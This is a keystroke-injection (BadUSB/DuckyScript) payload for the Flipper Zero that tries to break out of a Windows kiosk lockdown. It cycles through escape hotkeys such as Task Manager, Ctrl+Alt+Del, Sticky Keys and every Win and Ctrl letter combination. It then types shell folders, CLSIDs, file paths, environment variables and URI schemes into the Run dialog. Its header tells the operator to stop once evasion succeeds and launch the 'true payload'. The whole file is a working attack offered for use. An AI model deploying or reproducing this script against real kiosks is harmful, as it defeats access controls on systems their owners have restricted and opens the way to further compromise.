REM KIOSK EVASION EXPERIEMENTAL PAYLOADS
REM Target: Windows
REM Stop this script when evasion is succeed
REM and run your true payload
REM optimised for Flipper Zero
REM Auth: @nocomp
REM Props: @FalsePhilosopher for showing @nocomp the trustedsec blog post this was built from
REM Source: https://github.com/nocomp/Kiosk-evasion-BADUsb-Bruteforce
DELAY 2000
ALT F4
DELAY 700
ALT SPACE
DELAY 700
ALT TAB
DELAY 700
CTRL B
DELAY 700
CTRL ALT DEL
DELAY 700
CTRL ESC
DELAY 700
CTRL F4
DELAY 700
CTRL P
DELAY 700
CTRL SHIFT ESC
DELAY 700
CTRL TAB
DELAY 700
CTRL GUI F
DELAY 700
F1
DELAY 500
F3
DELAY 500
SHIFT
SHIFT
SHIFT
SHIFT
SHIFT
DELAY 700
GUI BREAK
DELAY 500
GUI d
DELAY 700
GUI e
DELAY 700
GUI F1
DELAY 700
GUI r
DELAY 700
GUI t
DELAY 700
GUI u
DELAY 700
GUI p
DELAY 700
GUI c
DELAY 700
GUI v 
DELAY 700
GUI k
DELAY 700
GUI a
DELAY 700
GUI SPACEBAR
DELAY 700
GUI a
DELAY 700
GUI b
DELAY 700
GUI c
DELAY 700
GUI d
DELAY 700
GUI e
DELAY 700
GUI f
DELAY 700
GUI g
DELAY 700
GUI h
DELAY 700
GUI i
DELAY 700
GUI j
DELAY 700
GUI k
DELAY 700
GUI m
DELAY 700
GUI n
DELAY 700
GUI o
DELAY 700
GUI p
DELAY 700
GUI q
DELAY 700
GUI r
DELAY 700
GUI s
DELAY 700
GUI t
DELAY 700
GUI u
DELAY 700
GUI v
DELAY 700
GUI w
DELAY 700
GUI x
DELAY 700
GUI y
DELAY 700
GUI z
DELAY 700
CTRL a
DELAY 700
CTRL b
DELAY 700
CTRL c
DELAY 700
CTRL d
DELAY 700
CTRL e
DELAY 700
CTRL f
DELAY 700
CTRL g
DELAY 700
CTRL h
DELAY 700
CTRL i
DELAY 700
CTRL j
DELAY 700
CTRL k
DELAY 700
CTRL l
DELAY 700
CTRL m
DELAY 700
CTRL n
DELAY 700
CTRL o
DELAY 700
CTRL p
DELAY 700
CTRL q
DELAY 700
CTRL r
DELAY 700
CTRL s
DELAY 700
CTRL t
DELAY 700
CTRL u
DELAY 700
CTRL v
DELAY 700
CTRL w
DELAY 700
CTRL x
DELAY 700
CTRL y
DELAY 700
CTRL z
DELAY 700
REM TASK MANAGER
DELAY 500
CTRL SHIFT ESC
DELAY 500
REM HIDDEN ADMIN MENU
DELAY 500
CTRL ALT F8
DELAY 500
CTRL ESC F9
REM MOUSE KEYS
DELAY 500
SHIFT ALT NUMLOCK
DELAY 500
REM CONTEXT MENU
DELAY 500
SHIFT F10
DELAY 500
F1
DELAY 500
GUI r
ALTSTRING shell:Administrative Tools
ENTER
DELAY 500
GUI r
ALTSTRING shell:DocumentsLibrary
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING shell:Libraries
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING shell:UserProfiles
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING shell:Personal
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING shell:SearchHomeFolder
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING shell:NetworkPlacesFolder
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING shell:SendTo
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING shell:UserProfiles
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING shell:Common Administrative Tools
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING shell:MyComputerFolder
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING shell:InternetFolder
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING Shell:Profile
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING Shell:ProgramFiles
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING Shell:System
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING Shell:ControlPanelFolder
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING Shell:Windows
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING shell:::{21EC2020 3AEA 1069 A2DD 08002B30309D}
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING shell:::{20D04FE0 3AEA 1069 A2D8 08002B30309D}
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING shell:::{{208D2C60 3AEA 1069 A2D7 08002B30309D}}
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING shell:::{871C5380 42A0 1069 A2EA 08002B30309D}
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING file:///C:/Kiosk/HTML/index.html
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING file:///C:/Users/KioskRestricted
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING File:/C:/windows
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING File:/C:\windows\
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING File:/C:\windows/
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING File:/C:/windows
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING File://C:/windows
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING File://C:\windows/
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING file://C:\windows
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING C:/windows
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING C:\windows\
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING C:\windows
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING C:/windows/
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING C:/windows\
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING %WINDIR%
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING %TMP%
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING %TEMP%
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING %SYSTEMDRIVE%
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING %SYSTEMROOT%
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING %APPDATA%
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING %HOMEDRIVE%
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING %HOMESHARE%
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING Callto://
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING Gopher://
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING DHCP://
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING Telnet://
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING TN3270://
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING Rlogin://
ENTER
DELAY 500
GUI r
DELAY 500
ALTSTRING LDAP://
DELAY 500
GUI r
DELAY 500
ALTSTRING News://
DELAY 500
GUI r
DELAY 500
ALTSTRING Mailto://
DELAY 500
GUI r
DELAY 500
ALTSTRING MMS://
DELAY 500
GUI r
DELAY 500
ALTSTRING SKYPE://
DELAY 500
GUI r
DELAY 500
ALTSTRING SIP://
DELAY 500
GUI r
DELAY 500
ALTSTRING Play://
DELAY 500
GUI r
DELAY 500
ALTSTRING Steam://
DELAY 500
GUI r
DELAY 500
ALTSTRING Quicktime://
DELAY 500
GUI r
DELAY 500
ALTSTRING smb://
DELAY 500
GUI r
DELAY 500
ALTSTRING ftp://
